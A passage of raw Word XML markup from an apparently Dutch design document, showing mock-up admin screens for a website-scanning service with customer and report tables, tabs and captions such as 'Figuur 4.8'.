        <w:t xml:space="preserve">r een inlogsysteem zo kunnen </w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t>meerdere administrators</w:t>
      </w:r>
      <w:r w:rsidR="0031747F">
        <w:t xml:space="preserve"> er </w:t>
      </w:r>
      <w:r w:rsidR="00B249DE">
        <w:t>geb</w:t>
      </w:r>
      <w:r w:rsidR="0031747F">
        <w:t>ruik van maken.</w:t>
      </w:r>
      <w:r w:rsidR="0075098B" w:rsidRPr="0075098B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA638B9" w14:textId="69C00AAC" w:rsidR="00FE20CD" w:rsidRDefault="00235634">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252494848" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C462615" wp14:editId="79DFF240">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-263691</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>349388</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6603531" cy="2780030"/>
                <wp:effectExtent l="0" t="0" r="26035" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="11" name="Rectangle 11"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6603531" cy="278003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D1B3" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:-20.75pt;margin-top:27.5pt;width:519.95pt;height:218.9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" fillcolor="#b4c7e7" strokecolor="#1f3763 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F849F75" w14:textId="56F02F67" w:rsidR="002743B7" w:rsidRDefault="005A717D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252524544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43A7044E" wp14:editId="538CA61F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3552825</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="817880" cy="2286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8178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D4706" w14:textId="7E18E822" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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7044E" id="Text Box 152" o:spid="_x0000_s1090" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:279.75pt;margin-top:15.25pt;width:64.4pt;height:18pt;z-index:2525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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="00DD4706" w14:textId="7E18E822" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>[Rapporten]</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252523520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5236DED7" wp14:editId="4013E744">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4427220</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>196215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="705485" cy="23558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705485"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BF8CF" w14:textId="358D4F17" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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DED7" id="Text Box 149" o:spid="_x0000_s1091" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:348.6pt;margin-top:15.45pt;width:55.55pt;height:18.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="435BF8CF" w14:textId="358D4F17" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>[Klanten]</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002238A2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252522496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B209B05" wp14:editId="2240207B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5258435</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193675</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="635000" cy="2286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582C5" w14:textId="62443B83" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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09B05" id="Text Box 148" o:spid="_x0000_s1092" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:414.05pt;margin-top:15.25pt;width:50pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="056582C5" w14:textId="62443B83" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Admin</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6B649F" w14:textId="2C8E8C9B" w:rsidR="003E71A0" w:rsidRDefault="00C14854">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252513280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C20A618" wp14:editId="7D03AF47">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>561423</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>230091</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5080166" cy="2540"/>
                <wp:effectExtent l="0" t="0" r="25400" b="48260"/>
                <wp:wrapNone/>
                <wp:docPr id="564" name="Straight Connector 564"/>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4196F0" id="Straight Connector 564" o:spid="_x0000_s1026" style="position:absolute;flip:y;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pt,18.1pt" to="444.2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" strokecolor="#4472c4 [3204]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4A9BF5" w14:textId="3401A1E8" w:rsidR="0031747F" w:rsidRDefault="00C14854">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252519424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37958660" wp14:editId="30C6162C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2588895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>154305</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1461135" cy="33972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4611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B1CDC" w14:textId="5F9E0915" w:rsidR="002A05E5" w:rsidRPr="004756DF" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004756DF">
                              <w:rPr>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Accoun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8660" id="Text Box 138" o:spid="_x0000_s1093" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:203.85pt;margin-top:12.15pt;width:115.05pt;height:26.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7ECB1CDC" w14:textId="5F9E0915" w:rsidR="002A05E5" w:rsidRPr="004756DF" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004756DF">
                        <w:rPr>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Accountscherm</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EAF62" w14:textId="06BD315F" w:rsidR="00FE20CD" w:rsidRDefault="00FE20CD"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2610" w:tblpY="3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1510"/>
        <w:gridCol w:w="1510"/>
        <w:gridCol w:w="2499"/>
        <w:gridCol w:w="1016"/>
        <w:gridCol w:w="1040"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E92CE4" w14:paraId="44A4A261" w14:textId="77777777" w:rsidTr="00E9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20EF528" w14:textId="77777777" w:rsidR="00C14854" w:rsidRDefault="00C14854" w:rsidP="00C14854">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1510" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62DFA871"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Bedrijf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="394DD7A2"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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5640DB"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E-mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A031E0C"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Premium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E92CE4" w14:paraId="5F97A739" w14:textId="77777777" w:rsidTr="00E92CE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10" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF62BEA" w14:textId="75D906E0" w:rsidR="00C14854" w:rsidRPr="00E92CE4" w:rsidRDefault="00E92CE4" w:rsidP="00E92CE4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E92CE4">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Jan-Willem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1510" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FFB78D" w14:textId="2A25B0B1" w:rsidR="00C14854" w:rsidRDefault="00E92CE4" w:rsidP="00E92CE4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tennisshop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2499" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D318CB0" w14:textId="0CF7E603" w:rsidR="00C14854" w:rsidRDefault="00E92CE4" w:rsidP="00C14854">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>www.onlinetennisshop.nl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70EF2E6D" w14:textId="1D3FA608" w:rsidR="00C14854" w:rsidRDefault="00E92CE4" w:rsidP="00C14854">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1040" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22D4FA6B" w14:textId="1EF6E310" w:rsidR="00C14854" w:rsidRDefault="00681A8D" w:rsidP="00E92CE4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>[actief]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="164AF8C7" w14:textId="02B5D31C" w:rsidR="00FE20CD" w:rsidRDefault="00FE20CD"/>
    <w:p w14:paraId="568F6CD9" w14:textId="7E58B871" w:rsidR="00A443D4" w:rsidRDefault="002A7B3D">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252530688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="533C9B96" wp14:editId="2CA8C65B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3358156</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>44588</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="25400" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="166" name="Straight Connector 16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76F20" id="Straight Connector 166"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264.4pt,3.5pt" to="264.4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2528640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="554ECB1C" wp14:editId="1BFE2D7B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5196840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>41275</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="25400" b="127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6FC1D" id="Straight Connector 165"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409.2pt,3.25pt" to="409.2pt,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" strokecolor="#4472c4 [3204]" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D4B14B" w14:textId="4EA76EE0" w:rsidR="00B249DE" w:rsidRDefault="00235634">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252545024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BA143E0" wp14:editId="20D694BA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2719705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>190500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1268095" cy="45974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26809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9E3D5" w14:textId="34B95754" w:rsidR="002A05E5" w:rsidRPr="002B4F92" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002B4F92">
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>Deze URL wordt gebruikt bij het sca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43E0" id="Text Box 193" o:spid="_x0000_s1094" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:214.15pt;margin-top:15pt;width:99.85pt;height:36.2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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C69E3D5" w14:textId="34B95754" w:rsidR="002A05E5" w:rsidRPr="002B4F92" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002B4F92">
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>Deze URL wordt gebruikt bij het scannen</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002B4F92">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252546048" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34EC881B" wp14:editId="08555D9F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4370705</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>187960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1650365" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="198" name="Text Box 198"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="16503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71850" w14:textId="3A8FCEB3" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="16"/>
                              </w:rPr>
                              <w:t>Knop waarmee premiumaccount wordt geactiveerd</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="227A759E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="009833D6" w:rsidRDefault="002A05E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881B" id="Text Box 198" o:spid="_x0000_s1095" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:344.15pt;margin-top:14.8pt;width:129.95pt;height:27.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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="78D71850" w14:textId="3A8FCEB3" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>Knop waarmee premiumaccount wordt geactiveerd</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="227A759E" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="009833D6" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent5"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="2010" w:tblpY="3605"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1293"/>
        <w:gridCol w:w="1294"/>
        <w:gridCol w:w="1293"/>
        <w:gridCol w:w="1295"/>
        <w:gridCol w:w="1295"/>
        <w:gridCol w:w="1295"/>
        <w:gridCol w:w="1295"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A33407" w14:paraId="13A13772" w14:textId="77777777" w:rsidTr="00A33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28F7D5E" w14:textId="77777777" w:rsidR="00A33407" w:rsidRDefault="00A33407" w:rsidP="00A33407">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35C96F8B"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Bedrijf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BC8ECA9"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scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362BB59C"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rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45E2ED93"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Rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC0FA51"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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F4FCE10"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Verzenden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A33407" w14:paraId="5C562EE8" w14:textId="77777777" w:rsidTr="00A3340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94" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AD8DF04" w14:textId="77777777" w:rsidR="00A33407" w:rsidRPr="00E92CE4" w:rsidRDefault="00A33407" w:rsidP="00A33407">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Jan-Willem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CF064AF"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Tennisschop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D536B50"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scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54489874"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Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="000D836B"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r>
              <w:t>Pdf bestand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21775B37"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r>
              <w:t>verzonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1295" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AF3216C"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verzend]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CE3348B" w14:textId="7E9E2AE1" w:rsidR="00B568D8" w:rsidRDefault="0075098B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253204480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5402914E" wp14:editId="135C03A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-203200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3891915</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="788" name="Text Box 788"/>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79FE52" w14:textId="602B7EA7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                            <w:r>
                              <w:t>Figuur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2914E" id="Text Box 788" o:spid="_x0000_s1096" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-16pt;margin-top:306.45pt;width:70pt;height:27.4pt;z-index:2532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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5B79FE52" w14:textId="602B7EA7" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                      <w:r>
                        <w:t>Figuur 4.8</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253202432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28EF06FE" wp14:editId="2604F08C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-203200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>687070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="889000" cy="347980"/>
                <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="787" name="Text Box 787"/>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245261" w14:textId="0ACC1AC6" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0075098B">
                            <w:r>
